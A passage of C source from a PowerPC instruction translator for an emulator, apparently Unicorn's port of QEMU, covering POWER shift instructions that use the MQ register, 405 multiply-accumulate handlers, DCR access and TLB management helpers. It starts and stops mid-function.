t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* slq - slq. */ static void gen_slq(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGLabel *l1 = gen_new_label(tcg_ctx); TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)], 0x1F); tcg_gen_shl_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], t1); tcg_gen_subfi_tl(tcg_ctx, t1, 32, t1); tcg_gen_shr_tl(tcg_ctx, t1, cpu_gpr[rS(ctx->opcode)], t1); tcg_gen_or_tl(tcg_ctx, t1, t0, t1); gen_store_spr(tcg_ctx, SPR_MQ, t1); tcg_gen_andi_tl(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)], 0x20); tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t0); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, t1, 0, l1); tcg_gen_movi_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], 0); gen_set_label(tcg_ctx, l1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* sraiq - sraiq. */ static void gen_sraiq(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int sh = SH(ctx->opcode); TCGLabel *l1 = gen_new_label(tcg_ctx); TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); tcg_gen_shri_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], sh); tcg_gen_shli_tl(tcg_ctx, t1, cpu_gpr[rS(ctx->opcode)], 32 - sh); tcg_gen_or_tl(tcg_ctx, t0, t0, t1); gen_store_spr(tcg_ctx, SPR_MQ, t0); tcg_gen_movi_tl(tcg_ctx, cpu_ca, 0); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, t1, 0, l1); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_GE, cpu_gpr[rS(ctx->opcode)], 0, l1); tcg_gen_movi_tl(tcg_ctx, cpu_ca, 1); gen_set_label(tcg_ctx, l1); tcg_gen_sari_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rS(ctx->opcode)], sh); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* sraq - sraq. */ static void gen_sraq(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGLabel *l1 = gen_new_label(tcg_ctx); TCGLabel *l2 = gen_new_label(tcg_ctx); TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_local_new(tcg_ctx); TCGv t2 = tcg_temp_local_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t2, cpu_gpr[rB(ctx->opcode)], 0x1F); tcg_gen_shr_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], t2); tcg_gen_sar_tl(tcg_ctx, t1, cpu_gpr[rS(ctx->opcode)], t2); tcg_gen_subfi_tl(tcg_ctx, t2, 32, t2); tcg_gen_shl_tl(tcg_ctx, t2, cpu_gpr[rS(ctx->opcode)], t2); tcg_gen_or_tl(tcg_ctx, t0, t0, t2); gen_store_spr(tcg_ctx, SPR_MQ, t0); tcg_gen_andi_tl(tcg_ctx, t0, cpu_gpr[rB(ctx->opcode)], 0x20); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, t2, 0, l1); tcg_gen_mov_tl(tcg_ctx, t2, cpu_gpr[rS(ctx->opcode)]); tcg_gen_sari_tl(tcg_ctx, t1, cpu_gpr[rS(ctx->opcode)], 31); gen_set_label(tcg_ctx, l1); tcg_temp_free(tcg_ctx, t0); tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t1); tcg_gen_movi_tl(tcg_ctx, cpu_ca, 0); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_GE, t1, 0, l2); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, t2, 0, l2); tcg_gen_movi_tl(tcg_ctx, cpu_ca, 1); gen_set_label(tcg_ctx, l2); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* sre - sre. */ static void gen_sre(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)], 0x1F); tcg_gen_shr_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], t1); tcg_gen_subfi_tl(tcg_ctx, t1, 32, t1); tcg_gen_shl_tl(tcg_ctx, t1, cpu_gpr[rS(ctx->opcode)], t1); tcg_gen_or_tl(tcg_ctx, t1, t0, t1); tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t0); gen_store_spr(tcg_ctx, SPR_MQ, t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* srea - srea. */ static void gen_srea(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)], 0x1F); tcg_gen_rotr_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], t1); gen_store_spr(tcg_ctx, SPR_MQ, t0); tcg_gen_sar_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rS(ctx->opcode)], t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* sreq */ static void gen_sreq(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); TCGv t2 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t0, cpu_gpr[rB(ctx->opcode)], 0x1F); tcg_gen_movi_tl(tcg_ctx, t1, 0xFFFFFFFF); tcg_gen_shr_tl(tcg_ctx, t1, t1, t0); tcg_gen_rotr_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], t0); gen_load_spr(tcg_ctx, t2, SPR_MQ); gen_store_spr(tcg_ctx, SPR_MQ, t0); tcg_gen_and_tl(tcg_ctx, t0, t0, t1); tcg_gen_andc_tl(tcg_ctx, t2, t2, t1); tcg_gen_or_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t0, t2); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* sriq */ static void gen_sriq(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int sh = SH(ctx->opcode); TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); tcg_gen_shri_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], sh); tcg_gen_shli_tl(tcg_ctx, t1, cpu_gpr[rS(ctx->opcode)], 32 - sh); tcg_gen_or_tl(tcg_ctx, t1, t0, t1); tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t0); gen_store_spr(tcg_ctx, SPR_MQ, t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* srliq */ static void gen_srliq(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int sh = SH(ctx->opcode); TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); tcg_gen_rotri_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], sh); gen_load_spr(tcg_ctx, t1, SPR_MQ); gen_store_spr(tcg_ctx, SPR_MQ, t0); tcg_gen_andi_tl(tcg_ctx, t0, t0, (0xFFFFFFFFU >> sh)); tcg_gen_andi_tl(tcg_ctx, t1, t1, ~(0xFFFFFFFFU >> sh)); tcg_gen_or_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t0, t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* srlq */ static void gen_srlq(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGLabel *l1 = gen_new_label(tcg_ctx); TCGLabel *l2 = gen_new_label(tcg_ctx); TCGv t0 = tcg_temp_local_new(tcg_ctx); TCGv t1 = tcg_temp_local_new(tcg_ctx); TCGv t2 = tcg_temp_local_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t2, cpu_gpr[rB(ctx->opcode)], 0x1F); tcg_gen_movi_tl(tcg_ctx, t1, 0xFFFFFFFF); tcg_gen_shr_tl(tcg_ctx, t2, t1, t2); tcg_gen_andi_tl(tcg_ctx, t0, cpu_gpr[rB(ctx->opcode)], 0x20); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, t0, 0, l1); gen_load_spr(tcg_ctx, t0, SPR_MQ); tcg_gen_and_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t0, t2); tcg_gen_br(tcg_ctx, l2); gen_set_label(tcg_ctx, l1); tcg_gen_shr_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], t2); tcg_gen_and_tl(tcg_ctx, t0, t0, t2); gen_load_spr(tcg_ctx, t1, SPR_MQ); tcg_gen_andc_tl(tcg_ctx, t1, t1, t2); tcg_gen_or_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t0, t1); gen_set_label(tcg_ctx, l2); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* srq */ static void gen_srq(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGLabel *l1 = gen_new_label(tcg_ctx); TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)], 0x1F); tcg_gen_shr_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], t1); tcg_gen_subfi_tl(tcg_ctx, t1, 32, t1); tcg_gen_shl_tl(tcg_ctx, t1, cpu_gpr[rS(ctx->opcode)], t1); tcg_gen_or_tl(tcg_ctx, t1, t0, t1); gen_store_spr(tcg_ctx, SPR_MQ, t1); tcg_gen_andi_tl(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)], 0x20); tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t0); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, t0, 0, l1); tcg_gen_movi_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], 0); gen_set_label(tcg_ctx, l1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* PowerPC 602 specific instructions */ /* dsa */ static void gen_dsa(DisasContext *ctx) { /* XXX: TODO */ gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); } /* esa */ static void gen_esa(DisasContext *ctx) { /* XXX: TODO */ gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); } /* mfrom */ static void gen_mfrom(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; gen_helper_602_mfrom(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)]); } /* 602 - 603 - G2 TLB management */ /* tlbld */ static void gen_tlbld_6xx(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; gen_helper_6xx_tlbd(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rB(ctx->opcode)]); } /* tlbli */ static void gen_tlbli_6xx(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; gen_helper_6xx_tlbi(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rB(ctx->opcode)]); } /* 74xx TLB management */ /* tlbld */ static void gen_tlbld_74xx(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; gen_helper_74xx_tlbd(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rB(ctx->opcode)]); } /* tlbli */ static void gen_tlbli_74xx(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; gen_helper_74xx_tlbi(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rB(ctx->opcode)]); } /* POWER instructions not in PowerPC 601 */ /* clf */ static void gen_clf(DisasContext *ctx) { /* Cache line flush: implemented as no-op */ } /* cli */ static void gen_cli(DisasContext *ctx) { /* Cache line invalidate: privileged and treated as no-op */ CHK_SV; } /* dclst */ static void gen_dclst(DisasContext *ctx) { /* Data cache line store: treated as no-op */ } static void gen_mfsri(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int ra = rA(ctx->opcode); int rd = rD(ctx->opcode); TCGv t0; CHK_SV; t0 = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, t0); tcg_gen_extract_tl(tcg_ctx, t0, t0, 28, 4); gen_helper_load_sr(tcg_ctx, cpu_gpr[rd], tcg_ctx->cpu_env, t0); tcg_temp_free(tcg_ctx, t0); if (ra != 0 && ra != rd) { tcg_gen_mov_tl(tcg_ctx, cpu_gpr[ra], cpu_gpr[rd]); } } static void gen_rac(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; CHK_SV; t0 = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, t0); gen_helper_rac(tcg_ctx, cpu_gpr[rD(ctx->opcode)], tcg_ctx->cpu_env, t0); tcg_temp_free(tcg_ctx, t0); } static void gen_rfsvc(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; gen_helper_rfsvc(tcg_ctx, tcg_ctx->cpu_env); gen_sync_exception(ctx); } /* svc is not implemented for now */ /* BookE specific instructions */ /* XXX: not implemented on 440 ? */ static void gen_mfapidi(DisasContext *ctx) { /* XXX: TODO */ gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); } /* XXX: not implemented on 440 ? */ static void gen_tlbiva(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; CHK_SV; t0 = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, t0); gen_helper_tlbiva(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rB(ctx->opcode)]); tcg_temp_free(tcg_ctx, t0); } /* All 405 MAC instructions are translated here */ static inline void gen_405_mulladd_insn(DisasContext *ctx, int opc2, int opc3, int ra, int rb, int rt, int Rc) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0, t1; t0 = tcg_temp_local_new(tcg_ctx); t1 = tcg_temp_local_new(tcg_ctx); switch (opc3 & 0x0D) { case 0x05: /* macchw - macchw. - macchwo - macchwo. */ /* macchws - macchws. - macchwso - macchwso. */ /* nmacchw - nmacchw. - nmacchwo - nmacchwo. */ /* nmacchws - nmacchws. - nmacchwso - nmacchwso. */ /* mulchw - mulchw. */ tcg_gen_ext16s_tl(tcg_ctx, t0, cpu_gpr[ra]); tcg_gen_sari_tl(tcg_ctx, t1, cpu_gpr[rb], 16); tcg_gen_ext16s_tl(tcg_ctx, t1, t1); break; case 0x04: /* macchwu - macchwu. - macchwuo - macchwuo. */ /* macchwsu - macchwsu. - macchwsuo - macchwsuo. */ /* mulchwu - mulchwu. */ tcg_gen_ext16u_tl(tcg_ctx, t0, cpu_gpr[ra]); tcg_gen_shri_tl(tcg_ctx, t1, cpu_gpr[rb], 16); tcg_gen_ext16u_tl(tcg_ctx, t1, t1); break; case 0x01: /* machhw - machhw. - machhwo - machhwo. */ /* machhws - machhws. - machhwso - machhwso. */ /* nmachhw - nmachhw. - nmachhwo - nmachhwo. */ /* nmachhws - nmachhws. - nmachhwso - nmachhwso. */ /* mulhhw - mulhhw. */ tcg_gen_sari_tl(tcg_ctx, t0, cpu_gpr[ra], 16); tcg_gen_ext16s_tl(tcg_ctx, t0, t0); tcg_gen_sari_tl(tcg_ctx, t1, cpu_gpr[rb], 16); tcg_gen_ext16s_tl(tcg_ctx, t1, t1); break; case 0x00: /* machhwu - machhwu. - machhwuo - machhwuo. */ /* machhwsu - machhwsu. - machhwsuo - machhwsuo. */ /* mulhhwu - mulhhwu. */ tcg_gen_shri_tl(tcg_ctx, t0, cpu_gpr[ra], 16); tcg_gen_ext16u_tl(tcg_ctx, t0, t0); tcg_gen_shri_tl(tcg_ctx, t1, cpu_gpr[rb], 16); tcg_gen_ext16u_tl(tcg_ctx, t1, t1); break; case 0x0D: /* maclhw - maclhw. - maclhwo - maclhwo. */ /* maclhws - maclhws. - maclhwso - maclhwso. */ /* nmaclhw - nmaclhw. - nmaclhwo - nmaclhwo. */ /* nmaclhws - nmaclhws. - nmaclhwso - nmaclhwso. */ /* mullhw - mullhw. */ tcg_gen_ext16s_tl(tcg_ctx, t0, cpu_gpr[ra]); tcg_gen_ext16s_tl(tcg_ctx, t1, cpu_gpr[rb]); break; case 0x0C: /* maclhwu - maclhwu. - maclhwuo - maclhwuo. */ /* maclhwsu - maclhwsu. - maclhwsuo - maclhwsuo. */ /* mullhwu - mullhwu. */ tcg_gen_ext16u_tl(tcg_ctx, t0, cpu_gpr[ra]); tcg_gen_ext16u_tl(tcg_ctx, t1, cpu_gpr[rb]); break; } if (opc2 & 0x04) { /* (n)multiply-and-accumulate (0x0C / 0x0E) */ tcg_gen_mul_tl(tcg_ctx, t1, t0, t1); if (opc2 & 0x02) { /* nmultiply-and-accumulate (0x0E) */ tcg_gen_sub_tl(tcg_ctx, t0, cpu_gpr[rt], t1); } else { /* multiply-and-accumulate (0x0C) */ tcg_gen_add_tl(tcg_ctx, t0, cpu_gpr[rt], t1); } if (opc3 & 0x12) { /* Check overflow and/or saturate */ TCGLabel *l1 = gen_new_label(tcg_ctx); if (opc3 & 0x10) { /* Start with XER OV disabled, the most likely case */ tcg_gen_movi_tl(tcg_ctx, cpu_ov, 0); } if (opc3 & 0x01) { /* Signed */ tcg_gen_xor_tl(tcg_ctx, t1, cpu_gpr[rt], t1); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_GE, t1, 0, l1); tcg_gen_xor_tl(tcg_ctx, t1, cpu_gpr[rt], t0); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_LT, t1, 0, l1); if (opc3 & 0x02) { /* Saturate */ tcg_gen_sari_tl(tcg_ctx, t0, cpu_gpr[rt], 31); tcg_gen_xori_tl(tcg_ctx, t0, t0, 0x7fffffff); } } else { /* Unsigned */ tcg_gen_brcond_tl(tcg_ctx, TCG_COND_GEU, t0, t1, l1); if (opc3 & 0x02) { /* Saturate */ tcg_gen_movi_tl(tcg_ctx, t0, UINT32_MAX); } } if (opc3 & 0x10) { /* Check overflow */ tcg_gen_movi_tl(tcg_ctx, cpu_ov, 1); tcg_gen_movi_tl(tcg_ctx, cpu_so, 1); } gen_set_label(tcg_ctx, l1); tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rt], t0); } } else { tcg_gen_mul_tl(tcg_ctx, cpu_gpr[rt], t0, t1); } tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); if (unlikely(Rc) != 0) { /* Update Rc0 */ gen_set_Rc0(ctx, cpu_gpr[rt]); } } #define GEN_MAC_HANDLER(name, opc2, opc3) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ gen_405_mulladd_insn(ctx, opc2, opc3, rA(ctx->opcode), rB(ctx->opcode), \ rD(ctx->opcode), Rc(ctx->opcode)); \ } /* macchw - macchw. */ GEN_MAC_HANDLER(macchw, 0x0C, 0x05); /* macchwo - macchwo. */ GEN_MAC_HANDLER(macchwo, 0x0C, 0x15); /* macchws - macchws. */ GEN_MAC_HANDLER(macchws, 0x0C, 0x07); /* macchwso - macchwso. */ GEN_MAC_HANDLER(macchwso, 0x0C, 0x17); /* macchwsu - macchwsu. */ GEN_MAC_HANDLER(macchwsu, 0x0C, 0x06); /* macchwsuo - macchwsuo. */ GEN_MAC_HANDLER(macchwsuo, 0x0C, 0x16); /* macchwu - macchwu. */ GEN_MAC_HANDLER(macchwu, 0x0C, 0x04); /* macchwuo - macchwuo. */ GEN_MAC_HANDLER(macchwuo, 0x0C, 0x14); /* machhw - machhw. */ GEN_MAC_HANDLER(machhw, 0x0C, 0x01); /* machhwo - machhwo. */ GEN_MAC_HANDLER(machhwo, 0x0C, 0x11); /* machhws - machhws. */ GEN_MAC_HANDLER(machhws, 0x0C, 0x03); /* machhwso - machhwso. */ GEN_MAC_HANDLER(machhwso, 0x0C, 0x13); /* machhwsu - machhwsu. */ GEN_MAC_HANDLER(machhwsu, 0x0C, 0x02); /* machhwsuo - machhwsuo. */ GEN_MAC_HANDLER(machhwsuo, 0x0C, 0x12); /* machhwu - machhwu. */ GEN_MAC_HANDLER(machhwu, 0x0C, 0x00); /* machhwuo - machhwuo. */ GEN_MAC_HANDLER(machhwuo, 0x0C, 0x10); /* maclhw - maclhw. */ GEN_MAC_HANDLER(maclhw, 0x0C, 0x0D); /* maclhwo - maclhwo. */ GEN_MAC_HANDLER(maclhwo, 0x0C, 0x1D); /* maclhws - maclhws. */ GEN_MAC_HANDLER(maclhws, 0x0C, 0x0F); /* maclhwso - maclhwso. */ GEN_MAC_HANDLER(maclhwso, 0x0C, 0x1F); /* maclhwu - maclhwu. */ GEN_MAC_HANDLER(maclhwu, 0x0C, 0x0C); /* maclhwuo - maclhwuo. */ GEN_MAC_HANDLER(maclhwuo, 0x0C, 0x1C); /* maclhwsu - maclhwsu. */ GEN_MAC_HANDLER(maclhwsu, 0x0C, 0x0E); /* maclhwsuo - maclhwsuo. */ GEN_MAC_HANDLER(maclhwsuo, 0x0C, 0x1E); /* nmacchw - nmacchw. */ GEN_MAC_HANDLER(nmacchw, 0x0E, 0x05); /* nmacchwo - nmacchwo. */ GEN_MAC_HANDLER(nmacchwo, 0x0E, 0x15); /* nmacchws - nmacchws. */ GEN_MAC_HANDLER(nmacchws, 0x0E, 0x07); /* nmacchwso - nmacchwso. */ GEN_MAC_HANDLER(nmacchwso, 0x0E, 0x17); /* nmachhw - nmachhw. */ GEN_MAC_HANDLER(nmachhw, 0x0E, 0x01); /* nmachhwo - nmachhwo. */ GEN_MAC_HANDLER(nmachhwo, 0x0E, 0x11); /* nmachhws - nmachhws. */ GEN_MAC_HANDLER(nmachhws, 0x0E, 0x03); /* nmachhwso - nmachhwso. */ GEN_MAC_HANDLER(nmachhwso, 0x0E, 0x13); /* nmaclhw - nmaclhw. */ GEN_MAC_HANDLER(nmaclhw, 0x0E, 0x0D); /* nmaclhwo - nmaclhwo. */ GEN_MAC_HANDLER(nmaclhwo, 0x0E, 0x1D); /* nmaclhws - nmaclhws. */ GEN_MAC_HANDLER(nmaclhws, 0x0E, 0x0F); /* nmaclhwso - nmaclhwso. */ GEN_MAC_HANDLER(nmaclhwso, 0x0E, 0x1F); /* mulchw - mulchw. */ GEN_MAC_HANDLER(mulchw, 0x08, 0x05); /* mulchwu - mulchwu. */ GEN_MAC_HANDLER(mulchwu, 0x08, 0x04); /* mulhhw - mulhhw. */ GEN_MAC_HANDLER(mulhhw, 0x08, 0x01); /* mulhhwu - mulhhwu. */ GEN_MAC_HANDLER(mulhhwu, 0x08, 0x00); /* mullhw - mullhw. */ GEN_MAC_HANDLER(mullhw, 0x08, 0x0D); /* mullhwu - mullhwu. */ GEN_MAC_HANDLER(mullhwu, 0x08, 0x0C); /* mfdcr */ static void gen_mfdcr(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv dcrn; CHK_SV; dcrn = tcg_const_tl(tcg_ctx, SPR(ctx->opcode)); gen_helper_load_dcr(tcg_ctx, cpu_gpr[rD(ctx->opcode)], tcg_ctx->cpu_env, dcrn); tcg_temp_free(tcg_ctx, dcrn); } /* mtdcr */ static void gen_mtdcr(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv dcrn; CHK_SV; dcrn = tcg_const_tl(tcg_ctx, SPR(ctx->opcode)); gen_helper_store_dcr(tcg_ctx, tcg_ctx->cpu_env, dcrn, cpu_gpr[rS(ctx->opcode)]); tcg_temp_free(tcg_ctx, dcrn); } /* mfdcrx */ /* XXX: not implemented on 440 ? */ static void gen_mfdcrx(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; gen_helper_load_dcr(tcg_ctx, cpu_gpr[rD(ctx->opcode)], tcg_ctx->cpu_env, cpu_gpr[rA(ctx->opcode)]); /* Note: Rc update flag set leads to undefined state of Rc0 */ } /* mtdcrx */ /* XXX: not implemented on 440 ? */ static void gen_mtdcrx(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; gen_helper_store_dcr(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rS(ctx->opcode)]); /* Note: Rc update flag set leads to undefined state of Rc0 */ } /* mfdcrux (PPC 460) : user-mode access to DCR */ static void gen_mfdcrux(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_load_dcr(tcg_ctx, cpu_gpr[rD(ctx->opcode)], tcg_ctx->cpu_env, cpu_gpr[rA(ctx->opcode)]); /* Note: Rc update flag set leads to undefined state of Rc0 */ } /* mtdcrux (PPC 460) : user-mode access to DCR */ static void gen_mtdcrux(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_store_dcr(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rS(ctx->opcode)]); /* Note: Rc update flag set leads to undefined state of Rc0 */ } /* dccci */ static void gen_dccci(DisasContext *ctx) { CHK_SV; /* interpreted as no-op */ } /* dcread */ static void gen_dcread(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv EA, val; CHK_SV; gen_set_access_type(ctx, ACCESS_CACHE); EA = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, EA); val = tcg_temp_new(tcg_ctx); gen_qemu_ld32u(ctx, val, EA); tcg_temp_free(tcg_ctx, val); tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], EA); tcg_temp_free(tcg_ctx, EA); } /* icbt */ static void gen_icbt_40x(DisasContext *ctx) { /* * interpreted as no-op * XXX: specification say this is treated as a load by the MMU but * does not generate any exception */ } /* iccci */ static void gen_iccci(DisasContext *ctx) { CHK_SV; /* interpreted as no-op */ } /* icread */ static void gen_icread(DisasContext *ctx) { CHK_SV; /* interpreted as no-op */ } /* rfci (supervisor only) */ static void gen_rfci_40x(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; /* Restore CPU state */ gen_helper_40x_rfci(tcg_ctx, tcg_ctx->cpu_env); gen_sync_exception(ctx); } static void gen_rfci(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; /* Restore CPU state */ gen_helper_rfci(tcg_ctx, tcg_ctx->cpu_env); gen_sync_exception(ctx); } /* BookE specific */ /* XXX: not implemented on 440 ? */ static void gen_rfdi(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; /* Restore CPU state */ gen_helper_rfdi(tcg_ctx, tcg_ctx->cpu_env); gen_sync_exception(ctx); } /* XXX: not implemented on 440 ? */ static void gen_rfmci(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; /* Restore CPU state */ gen_helper_rfmci(tcg_ctx, tcg_ctx->cpu_env); gen_sync_exception(ctx); } /* TLB management - PowerPC 405 implementation */ /* tlbre */ static void gen_tlbre_40x(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; switch (rB(ctx->opcode)) { case 0: gen_helper_4xx_tlbre_hi(tcg_ctx, cpu_gpr[rD(ctx->opcode)], 